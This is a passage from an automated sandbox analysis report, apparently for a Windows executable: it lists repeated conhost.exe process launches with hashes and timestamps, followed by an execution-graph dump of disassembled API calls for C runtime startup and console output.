                                                                                                          File size:273920 bytes
                                                                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:91
                                                                                                          Start time:09:07:47
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                          Wow64 process (32bit):
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:
                                                                                                          Has administrator privileges:
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:93
                                                                                                          Start time:09:07:48
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                          Wow64 process (32bit):
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:
                                                                                                          Has administrator privileges:
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:104
                                                                                                          Start time:09:07:50
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                          Wow64 process (32bit):
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:
                                                                                                          Has administrator privileges:
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:119
                                                                                                          Start time:09:07:54
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                          Wow64 process (32bit):
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:
                                                                                                          Has administrator privileges:
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:120
                                                                                                          Start time:09:07:54
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7e4fa0000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:
                                                                                                          Has administrator privileges:
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:122
                                                                                                          Start time:09:07:55
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                          Wow64 process (32bit):
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:
                                                                                                          Has administrator privileges:
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:125
                                                                                                          Start time:09:07:55
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                          Wow64 process (32bit):
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:
                                                                                                          Has administrator privileges:
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:129
                                                                                                          Start time:09:08:00
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                          Wow64 process (32bit):
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:
                                                                                                          Has administrator privileges:
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:138
                                                                                                          Start time:09:08:07
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                          Wow64 process (32bit):
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:
                                                                                                          Has administrator privileges:
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:176
                                                                                                          Start time:09:08:40
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                          Wow64 process (32bit):
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:
                                                                                                          Has administrator privileges:
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:186
                                                                                                          Start time:09:08:40
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                          Wow64 process (32bit):
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:
                                                                                                          Has administrator privileges:
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:190
                                                                                                          Start time:09:08:40
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                          Wow64 process (32bit):
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:
                                                                                                          Has administrator privileges:
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:191
                                                                                                          Start time:09:08:40
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                          Wow64 process (32bit):
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:
                                                                                                          Has administrator privileges:
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          Disassembly

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:5%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:5.9%
                                                                                                            Total number of Nodes:978
                                                                                                            Total number of Limit Nodes:28
                                                                                                            execution_graph 37982 7ff650b7256c 37983 7ff650b725dc 37982->37983 37984 7ff650b72592 GetModuleHandleW 37982->37984 37999 7ff650b76968 EnterCriticalSection 37983->37999 37984->37983 37990 7ff650b7259f 37984->37990 37986 7ff650b7268b 37987 7ff650b769c8 abort LeaveCriticalSection 37986->37987 37989 7ff650b726b0 37987->37989 37988 7ff650b72660 37991 7ff650b72678 37988->37991 37995 7ff650b74590 33 API calls 37988->37995 37992 7ff650b726bc 37989->37992 37998 7ff650b726d8 11 API calls 37989->37998 37990->37983 38000 7ff650b72724 GetModuleHandleExW 37990->38000 37996 7ff650b74590 33 API calls 37991->37996 37993 7ff650b74290 16 API calls 37993->37988 37995->37991 37996->37986 37997 7ff650b725e6 37997->37986 37997->37988 37997->37993 37998->37992 38001 7ff650b72775 38000->38001 38002 7ff650b7274e GetProcAddress 38000->38002 38003 7ff650b72785 38001->38003 38004 7ff650b7277f FreeLibrary 38001->38004 38002->38001 38005 7ff650b72768 38002->38005 38003->37983 38004->38003 38005->38001 38006 7ff650b6a6ec 38031 7ff650b6a17c 38006->38031 38009 7ff650b6a70d __scrt_acquire_startup_lock 38012 7ff650b6a84d 38009->38012 38013 7ff650b6a72b 38009->38013 38010 7ff650b6a843 38093 7ff650b6aaf0 7 API calls 2 library calls 38010->38093 38094 7ff650b6aaf0 7 API calls 2 library calls 38012->38094 38021 7ff650b6a76d __scrt_release_startup_lock 38013->38021 38039 7ff650b74608 38013->38039 38017 7ff650b6a750 38018 7ff650b6a858 abort 38020 7ff650b6a7d6 38049 7ff650b73e9c 38020->38049 38021->38020 38090 7ff650b727c4 35 API calls __GSHandlerCheck_EH 38021->38090 38024 7ff650b6a7db 38053 7ff650b48044 38024->38053 38028 7ff650b6a7ff 38028->38018 38092 7ff650b6a310 7 API calls __scrt_initialize_crt 38028->38092 38030 7ff650b6a816 38030->38017 38095 7ff650b6a930 38031->38095 38034 7ff650b6a1ab 38097 7ff650b744c0 38034->38097 38038 7ff650b6a1a7 38038->38009 38038->38010 38041 7ff650b74620 38039->38041 38040 7ff650b6a74c 38040->38017 38045 7ff650b74590 38040->38045 38041->38040 38114 7ff650b6a390 InitializeCriticalSectionAndSpinCount GetModuleHandleW 38041->38114 38130 7ff650b6a600 38041->38130 38147 7ff650b72960 38041->38147 38046 7ff650b745cc 38045->38046 38047 7ff650b745eb 38045->38047 38046->38047 38248 7ff650b6a6d0 38046->38248 38047->38021 38050 7ff650b73eac 38049->38050 38051 7ff650b73eb1 38049->38051 38257 7ff650b73b5c 38050->38257 38051->38024 38297 7ff650b5adc4 GetModuleHandleW 38053->38297 38059 7ff650b48072 SetErrorMode GetModuleHandleW 38060 7ff650b54470 20 API calls 38059->38060 38061 7ff650b48097 38060->38061 38062 7ff650b53898 136 API calls 38061->38062 38063 7ff650b480aa 38062->38063 38064 7ff650b23acc 125 API calls 38063->38064 38065 7ff650b480b6 38064->38065 38066 7ff650b69b58 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38065->38066 38067 7ff650b480c7 38066->38067 38068 7ff650b480d9 38067->38068 38069 7ff650b23d0c GetCurrentProcess GetProcessAffinityMask 38067->38069 38070 7ff650b24b2c 156 API calls 38068->38070 38069->38068 38071 7ff650b480f0 38070->38071 38072 7ff650b48109 38071->38072 38074 7ff650b269f4 153 API calls 38071->38074 38073 7ff650b24b2c 156 API calls 38072->38073 38075 7ff650b48119 38073->38075 38076 7ff650b48101 38074->38076 38077 7ff650b48127 38075->38077 38080 7ff650b4812e 38075->38080 38078 7ff650b24c60 159 API calls 38076->38078 38079 7ff650b5af88 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 38077->38079 38078->38072 38079->38080 38081 7ff650b24680 58 API calls 38080->38081 38082 7ff650b48171 38081->38082 38083 7ff650b24dec 249 API calls 38082->38083 38084 7ff650b48179 38083->38084 38085 7ff650b481b8 38084->38085 38086 7ff650b481a6 38084->38086 38091 7ff650b6ac54 GetModuleHandleW 38085->38091 38087 7ff650b5af88 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 38086->38087 38088 7ff650b481ad 38087->38088 38088->38085 38089 7ff650b5aebc 14 API calls 38088->38089 38089->38085 38090->38020 38091->38028 38092->38030 38093->38012 38094->38018 38096 7ff650b6a19e __scrt_dllmain_crt_thread_attach 38095->38096 38096->38034 38096->38038 38098 7ff650b799bc 38097->38098 38099 7ff650b6a1b0 38098->38099 38102 7ff650b766f0 38098->38102 38099->38038 38101 7ff650b6c88c 7 API calls 2 library calls 38099->38101 38101->38038 38113 7ff650b76968 EnterCriticalSection 38102->38113 38104 7ff650b76700 38105 7ff650b780f8 32 API calls 38104->38105 38106 7ff650b76709 38105->38106 38108 7ff650b76500 34 API calls 38106->38108 38112 7ff650b76717 38106->38112 38107 7ff650b769c8 abort LeaveCriticalSection 38110 7ff650b76723 38107->38110 38109 7ff650b76712 38108->38109 38111 7ff650b765ec GetStdHandle GetFileType 38109->38111 38110->38098 38111->38112 38112->38107 38115 7ff650b6a3d6 GetProcAddress GetProcAddress 38114->38115 38116 7ff650b6a3c1 GetModuleHandleW 38114->38116 38118 7ff650b6a413 CreateEventW 38115->38118 38119 7ff650b6a3fe 38115->38119 38116->38115 38117 7ff650b6a455 38116->38117 38167 7ff650b6aaf0 7 API calls 2 library calls 38117->38167 38118->38117 38121 7ff650b6a403 38118->38121 38119->38118 38119->38121 38159 7ff650b6a1c8 38121->38159 38122 7ff650b6a45f DeleteCriticalSection 38124 7ff650b6a47d CloseHandle 38122->38124 38125 7ff650b6a483 38122->38125 38124->38125 38125->38041 38126 7ff650b6a438 38126->38117 38127 7ff650b6a43c 38126->38127 38164 7ff650b6a378 38127->38164 38131 7ff650b6a610 38130->38131 38174 7ff650b72d50 38131->38174 38133 7ff650b6a61c 38134 7ff650b6a1c8 7 API calls 38133->38134 38137 7ff650b6a634 _RTC_Initialize 38134->38137 38135 7ff650b6a689 38146 7ff650b6a6a5 38135->38146 38209 7ff650b6aaf0 7 API calls 2 library calls 38135->38209 38137->38135 38139 7ff650b6a378 34 API calls 38137->38139 38138 7ff650b6a6b5 38138->38041 38140 7ff650b6a649 38139->38140 38180 7ff650b739e4 38140->38180 38144 7ff650b6a65e 38145 7ff650b746f8 35 API calls 38144->38145 38145->38135 38146->38041 38148 7ff650b7298a 38147->38148 38230 7ff650b77244 38148->38230 38151 7ff650b7495c __free_lconv_mon 15 API calls 38152 7ff650b729b7 38151->38152 38153 7ff650b77244 abort 15 API calls 38152->38153 38157 7ff650b729e1 38152->38157 38155 7ff650b729d3 38153->38155 38156 7ff650b7495c __free_lconv_mon 15 API calls 38155->38156 38156->38157 38158 7ff650b729ea 38157->38158 38237 7ff650b76de4 6 API calls __vcrt_uninitialize_ptd 38157->38237 38158->38041 38160 7ff650b6a1d9 38159->38160 38161 7ff650b6a1de __scrt_acquire_startup_lock 38159->38161 38160->38161 38168 7ff650b6aaf0 7 API calls 2 library calls 38160->38168 38161->38126 38163 7ff650b6a252 38169 7ff650b6a33c 38164->38169 38166 7ff650b6a381 38166->38041 38167->38122 38168->38163 38170 7ff650b6a356 38169->38170 38172 7ff650b6a34f 38169->38172 38173 7ff650b7430c 34 API calls 38170->38173 38172->38166 38173->38172 38175 7ff650b72d61 38174->38175 38176 7ff650b72d69 38175->38176 38210 7ff650b74dac 15 API calls abort 38175->38210 38176->38133 38178 7ff650b72d78 38211 7ff650b74c8c 31 API calls _invalid_parameter_noinfo 38178->38211 38181 7ff650b73a18 38180->38181 38182 7ff650b73a02 38180->38182 38214 7ff650b78fe0 38181->38214 38212 7ff650b74dac 15 API calls abort 38182->38212 38185 7ff650b73a07 38213 7ff650b74c8c 31 API calls _invalid_parameter_noinfo 38185->38213 38188 7ff650b73a4a 38218 7ff650b737c4 35 API calls 38188->38218 38189 7ff650b6a655 38189->38135 38208 7ff650b6add0 InitializeSListHead 38189->38208 38191 7ff650b73a74 38219 7ff650b73980 15 API calls 2 library calls 38191->38219 38193 7ff650b73a8a 38194 7ff650b73a92 38193->38194 38195 7ff650b73aa3 38193->38195 38220 7ff650b74dac 15 API calls abort 38194->38220 38221 7ff650b737c4 35 API calls 38195->38221 38198 7ff650b7495c __free_lconv_mon 15 API calls 38198->38189 38199 7ff650b73abf 38200 7ff650b73b08 38199->38200 38201 7ff650b73aef 38199->38201 38205 7ff650b73a97 38199->38205 38203 7ff650b7495c __free_lconv_mon 15 API calls 38200->38203 38222 7ff650b7495c 38201->38222 38203->38205 38204 7ff650b73af8 38206 7ff650b7495c __free_lconv_mon 15 API calls 38204->38206 38205->38198 38207 7ff650b73b04 38206->38207 38207->38189 38209->38138 38210->38178 38211->38176 38212->38185 38213->38189 38215 7ff650b78fed 38214->38215 38216 7ff650b73a1d GetModuleFileNameA 38214->38216 38228 7ff650b78e20 48 API calls 5 library calls 38215->38228 38216->38188 38218->38191 38219->38193 38220->38205 38221->38199 38223 7ff650b74961 RtlReleasePrivilege 38222->38223 38227 7ff650b74991 __free_lconv_mon 38222->38227 38224 7ff650b7497c 38223->38224 38223->38227 38229 7ff650b74dac 15 API calls abort 38224->38229 38226 7ff650b74981 GetLastError 38226->38227 38227->38204 38228->38216 38229->38226 38235 7ff650b77255 setbuf 38230->38235 38231 7ff650b772a6 38241 7ff650b74dac 15 API calls abort 38231->38241 38232 7ff650b7728a RtlAllocateHeap 38233 7ff650b729a9 38232->38233 38232->38235 38233->38151 38235->38231 38235->38232 38238 7ff650b73598 38235->38238 38237->38157 38242 7ff650b735d8 38238->38242 38241->38233 38247 7ff650b76968 EnterCriticalSection 38242->38247 38244 7ff650b735e5 38245 7ff650b769c8 abort LeaveCriticalSection 38244->38245 38246 7ff650b735aa 38245->38246 38246->38235 38256 7ff650b6aca8 SetUnhandledExceptionFilter 38248->38256 38258 7ff650b73b70 38257->38258 38262 7ff650b73b79 38257->38262 38258->38262 38263 7ff650b73ba4 38258->38263 38262->38051 38264 7ff650b73bbd 38263->38264 38273 7ff650b73b82 38263->38273 38265 7ff650b78fe0 48 API calls 38264->38265 38266 7ff650b73bc2 38265->38266 38276 7ff650b793fc GetEnvironmentStringsW 38266->38276 38269 7ff650b73bcf 38271 7ff650b7495c __free_lconv_mon 15 API calls 38269->38271 38271->38273 38272 7ff650b73bdc 38274 7ff650b7495c __free_lconv_mon 15 API calls 38272->38274 38273->38262 38275 7ff650b73d50 17 API calls 2 library calls 38273->38275 38274->38269 38275->38262 38277 7ff650b7942a WideCharToMultiByte 38276->38277 38287 7ff650b794ce 38276->38287 38281 7ff650b79484 38277->38281 38277->38287 38279 7ff650b794d8 FreeEnvironmentStringsW 38280 7ff650b73bc7 38279->38280 38280->38269 38288 7ff650b73c10 31 API calls 4 library calls 38280->38288 38289 7ff650b7499c 38281->38289 38284 7ff650b79494 WideCharToMultiByte 38285 7ff650b794bb 38284->38285 38286 7ff650b7495c __free_lconv_mon 15 API calls 38285->38286 38286->38287 38287->38279 38287->38280 38288->38272 38290 7ff650b749e7 38289->38290 38294 7ff650b749ab setbuf 38289->38294 38296 7ff650b74dac 15 API calls abort 38290->38296 38292 7ff650b749ce RtlAllocateHeap 38293 7ff650b749e5 38292->38293 38292->38294 38293->38284 38293->38285 38294->38290 38294->38292 38295 7ff650b73598 setbuf 2 API calls 38294->38295 38295->38294 38296->38293 38298 7ff650b5ade6 GetProcAddress 38297->38298 38299 7ff650b4805f 38297->38299 38300 7ff650b5adfb 38298->38300 38301 7ff650b5ae11 GetProcAddress 38298->38301 38302 7ff650b279e8 38299->38302 38300->38301 38301->38299 38303 7ff650b279f6 38302->38303 38323 7ff650b72d34 38303->38323 38305 7ff650b27a00 38306 7ff650b72d34 setbuf 60 API calls 38305->38306 38307 7ff650b27a14 38306->38307 38332 7ff650b27ac4 GetStdHandle GetFileType 38307->38332 38310 7ff650b27ac4 3 API calls 38311 7ff650b27a2e 38310->38311 38312 7ff650b27ac4 3 API calls 38311->38312 38314 7ff650b27a3e 38312->38314 38313 7ff650b27a92 38322 7ff650b2cc68 SetConsoleCtrlHandler 38313->38322 38316 7ff650b27a6b 38314->38316 38335 7ff650b72d0c 31 API calls 2 library calls 38314->38335 38316->38313 38337 7ff650b72d0c 31 API calls 2 library calls 38316->38337 38317 7ff650b27a5f 38336 7ff650b72d90 33 API calls 3 library calls 38317->38336 38320 7ff650b27a86 38338 7ff650b72d90 33 API calls 3 library calls 38320->38338 38324 7ff650b72d39 38323->38324 38325 7ff650b77f90 38324->38325 38327 7ff650b77fcb 38324->38327 38339 7ff650b74dac 15 API calls abort 38325->38339 38341 7ff650b77e40 60 API calls 2 library calls 38327->38341 38328 7ff650b77f95 38340 7ff650b74c8c 31 API calls _invalid_parameter_noinfo 38328->38340 38331 7ff650b77fa0 38331->38305 38333 7ff650b27ae1 GetConsoleMode 38332->38333 38334 7ff650b27a1e 38332->38334 38333->38334 38334->38310 38335->38317 38336->38316 38337->38320 38338->38313 38339->38328 38340->38331 38341->38331 38342 7ff650b119ca 38371 7ff650b4356c 38342->38371 38345 7ff650b4356c CompareStringW 38348 7ff650b119ec 38345->38348 38346 7ff650b11a59 38347 7ff650b11a98 38346->38347 38435 7ff650b440c4 62 API calls 2 library calls 38346->38435 38353 7ff650b11aad 38347->38353 38436 7ff650b332f0 149 API calls 3 library calls 38347->38436 38348->38346 38420 7ff650b111c0 38348->38420 38355 7ff650b11af5 38353->38355 38375 7ff650b54598 38353->38375 38388 7ff650b1555c 38355->38388 38363 7ff650b173c8 20 API calls 38367 7ff650b11b57 38363->38367 38437 7ff650b175d4 38367->38437 38372 7ff650b43580 38371->38372 38374 7ff650b119d9 38371->38374 38372->38374 38441 7ff650b5d600 CompareStringW 38372->38441 38374->38345 38374->38348 38376 7ff650b545ab 38375->38376 38442 7ff650b53780 38376->38442 38379 7ff650b11aed 38382 7ff650b283f0 38379->38382 38380 7ff650b54610 LoadStringW 38380->38379 38381 7ff650b54629 LoadStringW 38380->38381 38381->38379 38383 7ff650b28416 38382->38383 38384 7ff650b28450 38382->38384 38474 7ff650b72cc8 38383->38474 38384->38355 38386 7ff650b28428 38482 7ff650b2803c 38386->38482 38391 7ff650b1557b setbuf 38388->38391 38389 7ff650b1564e memcpy_s 38558 7ff650b5b9d8 GetSystemTime SystemTimeToFileTime 38389->38558 38391->38389 38406 7ff650b1568c memcpy_s 38391->38406 38392 7ff650b15687 38547 7ff650b16f4c 38392->38547 38398 7ff650b157ed 38554 7ff650b56a54 38398->38554 38400 7ff650b157fa 38401 7ff650b69d10 _handle_error 8 API calls 38400->38401 38402 7ff650b11b1e 38401->38402 38408 7ff650b173c8 38402->38408 38406->38392 38539 7ff650b574dc 38406->38539 38562 7ff650b13390 128 API calls 38406->38562 38563 7ff650b26f88 10 API calls 38406->38563 38564 7ff650b15820 12 API calls 38406->38564 38565 7ff650b24164 13 API calls 38406->38565 38566 7ff650b168f4 127 API calls 2 library calls 38406->38566 38409 7ff650b173e7 38408->38409 38651 7ff650b4934c 38409->38651 38411 7ff650b1740b 38659 7ff650b4730c 38411->38659 38414 7ff650b69b58 4 API calls 38415 7ff650b174e0 38414->38415 38416 7ff650b174f2 memcpy_s 38415->38416 38674 7ff650b38bc4 38415->38674 38663 7ff650b29b14 38416->38663 38729 7ff650b5bcd8 38420->38729 38423 7ff650b69d10 _handle_error 8 API calls 38424 7ff650b1123c 38423->38424 38425 7ff650b2c930 38424->38425 38426 7ff650b5c860 MessageBeep 38425->38426 38428 7ff650b2c946 38426->38428 38427 7ff650b2cd85 38427->38346 38428->38427 38429 7ff650b2cdb2 38428->38429 38430 7ff650b54598 48 API calls 38428->38430 38937 7ff650b6b168 38429->38937 38431 7ff650b2cda3 38430->38431 38433 7ff650b283f0 54 API calls 38431->38433 38433->38429 38434 7ff650b2cdd1 38435->38347 38436->38353 38438 7ff650b175f4 38437->38438 38942 7ff650b49414 38438->38942 38441->38374 38449 7ff650b53670 38442->38449 38446 7ff650b537e5 38459 7ff650b69d10 38446->38459 38450 7ff650b536a6 38449->38450 38458 7ff650b5373c 38449->38458 38454 7ff650b536d3 38450->38454 38469 7ff650b5d390 WideCharToMultiByte 38450->38469 38452 7ff650b69d10 _handle_error 8 API calls 38453 7ff650b53770 38452->38453 38453->38446 38468 7ff650b5380c 31 API calls 38453->38468 38457 7ff650b53702 38454->38457 38470 7ff650b542b0 45 API calls 2 library calls 38454->38470 38471 7ff650b7184c 31 API calls 2 library calls 38457->38471 38458->38452 38460 7ff650b69d19 38459->38460 38461 7ff650b537fe 38460->38461 38462 7ff650b69d90 IsProcessorFeaturePresent 38460->38462 38461->38379 38461->38380 38463 7ff650b69da8 38462->38463 38472 7ff650b69f84 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 38463->38472 38465 7ff650b69dbb 38473 7ff650b69d5c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38465->38473 38468->38446 38469->38454 38470->38457 38471->38458 38472->38465 38475 7ff650b72ce6 38474->38475 38476 7ff650b72cdf 38474->38476 38505 7ff650b72afc EnterCriticalSection 38475->38505 38504 7ff650b72be4 4 API calls 2 library calls 38476->38504 38479 7ff650b72ce4 38479->38386 38484 7ff650b28078 38482->38484 38483 7ff650b280b7 38485 7ff650b280be GetStdHandle 38483->38485 38484->38483 38487 7ff650b2817f swprintf 38484->38487 38486 7ff650b280d7 swprintf 38485->38486 38488 7ff650b71614 swprintf 46 API calls 38486->38488 38506 7ff650b71614 38487->38506 38490 7ff650b28100 38488->38490 38492 7ff650b2810b WriteFile 38490->38492 38498 7ff650b28136 38490->38498 38533 7ff650b5d390 WideCharToMultiByte 38490->38533 38491 7ff650b281ab 38493 7ff650b281b2 GetStdHandle 38491->38493 38500 7ff650b281e8 38492->38500 38494 7ff650b281c8 38493->38494 38494->38494 38497 7ff650b281d2 WriteConsoleW 38494->38497 38497->38500 38498->38492 38501 7ff650b2814e CharToOemA 38498->38501 38502 7ff650b69d10 _handle_error 8 API calls 38500->38502 38501->38492 38503 7ff650b281f8 38502->38503 38503->38384 38504->38479 38507 7ff650b7165a 38506->38507 38508 7ff650b71672 38506->38508 38534 7ff650b74dac 15 API calls abort 38507->38534 38508->38507 38510 7ff650b7167c 38508->38510 38536 7ff650b6f614 35 API calls 2 library calls 38510->38536 38511 7ff650b7165f 38535 7ff650b74c8c 31 API calls _invalid_parameter_noinfo 38511->38535 38514 7ff650b7168d memcpy_s 38537 7ff650b6f594 15 API calls _set_errno_from_matherr 38514->38537 38515 7ff650b69d10 _handle_error 8 API calls 38516 7ff650b7182f 38515->38516 38516->38491 38518 7ff650b716f8 38538 7ff650b6fa1c 46 API calls 3 library calls 38518->38538 38520 7ff650b71701 38521 7ff650b71709 38520->38521 38524 7ff650b71738 38520->38524 38522 7ff650b7495c __free_lconv_mon 15 API calls 38521->38522 38532 7ff650b7166a 38522->38532 38523 7ff650b71790 38529 7ff650b7495c __free_lconv_mon 15 API calls 38523->38529 38524->38523 38525 7ff650b7173e 38524->38525 38526 7ff650b717b6 38524->38526 38527 7ff650b71747 38524->38527 38525->38523 38525->38527 38526->38523 38530 7ff650b717c0 38526->38530 38528 7ff650b7495c __free_lconv_mon 15 API calls 38527->38528 38528->38532 38529->38532 38531 7ff650b7495c __free_lconv_mon 15 API calls 38530->38531 38531->38532 38532->38515 38533->38498 38534->38511 38535->38532 38536->38514 38537->38518 38538->38520 38541 7ff650b5750a 38539->38541 38545 7ff650b575b2 38539->38545 38540 7ff650b575d4 129 API calls 38540->38541 38541->38540 38542 7ff650b57531 38541->38542 38541->38545 38567 7ff650b56cc0 38541->38567 38600 7ff650b23f98 13 API calls 2 library calls 38541->38600 38599 7ff650b5b008 73 API calls _Init_thread_footer 38542->38599 38545->38406 38548 7ff650b16f7a 38547->38548 38553 7ff650b16ff4 __vcrt_InitializeCriticalSectionEx 38547->38553 38648 7ff650b59904 125 API calls memcpy_s 38548->38648 38550 7ff650b16f8f 38551 7ff650b16fc6 38550->38551 38550->38553 38551->38550 38649 7ff650b1721c 11 API calls 38551->38649 38553->38398 38555 7ff650b56aa0 38554->38555 38557 7ff650b56a76 38554->38557 38557->38555 38650 7ff650b34930 FindClose 38557->38650 38559 7ff650b69d10 _handle_error 8 API calls 38558->38559 38560 7ff650b1567a 38559->38560 38561 7ff650b168f4 127 API calls 2 library calls 38560->38561 38561->38392 38562->38406 38563->38406 38564->38406 38565->38406 38566->38406 38572 7ff650b56ce4 setbuf 38567->38572 38568 7ff650b69d10 _handle_error 8 API calls 38570 7ff650b57226 38568->38570 38570->38541 38582 7ff650b56d4a 38572->38582 38592 7ff650b56ec9 38572->38592 38593 7ff650b56e39 38572->38593 38601 7ff650b3494c 38572->38601 38573 7ff650b56f57 38575 7ff650b56f7a 38573->38575 38576 7ff650b56f68 38573->38576 38594 7ff650b56f9a 38575->38594 38623 7ff650b34930 FindClose 38575->38623 38622 7ff650b576ec 127 API calls 2 library calls 38576->38622 38578 7ff650b56f75 38578->38575 38581 7ff650b56df0 38581->38593 38595 7ff650b570fe 38581->38595 38598 7ff650b5719c 38581->38598 38624 7ff650b24164 13 API calls 38581->38624 38583 7ff650b56ebf 38582->38583 38585 7ff650b56ddc 38582->38585 38609 7ff650b69b58 38583->38609 38585->38581 38587 7ff650b56e4e 38585->38587 38588 7ff650b56e82 38587->38588 38587->38593 38607 7ff650b24164 13 API calls 38587->38607 38588->38593 38608 7ff650b2cab4 137 API calls 38588->38608 38589 7ff650b3494c 15 API calls 38589->38593 38618 7ff650b349c4 38592->38618 38593->38568 38594->38589 38594->38593 38595->38593 38595->38595 38596 7ff650b571d4 38595->38596 38595->38598 38625 7ff650b172f0 125 API calls _handle_error 38596->38625 38598->38593 38626 7ff650b387cc 10 API calls 3 library calls 38598->38626 38600->38541 38602 7ff650b34968 38601->38602 38606 7ff650b3499c 38602->38606 38627 7ff650b34ac0 38602->38627 38605 7ff650b34981 FindClose 38605->38606 38606->38582 38607->38588 38608->38593 38611 7ff650b69b63 38609->38611 38610 7ff650b69b7c 38610->38592 38611->38610 38612 7ff650b73598 setbuf 2 API calls 38611->38612 38613 7ff650b69b82 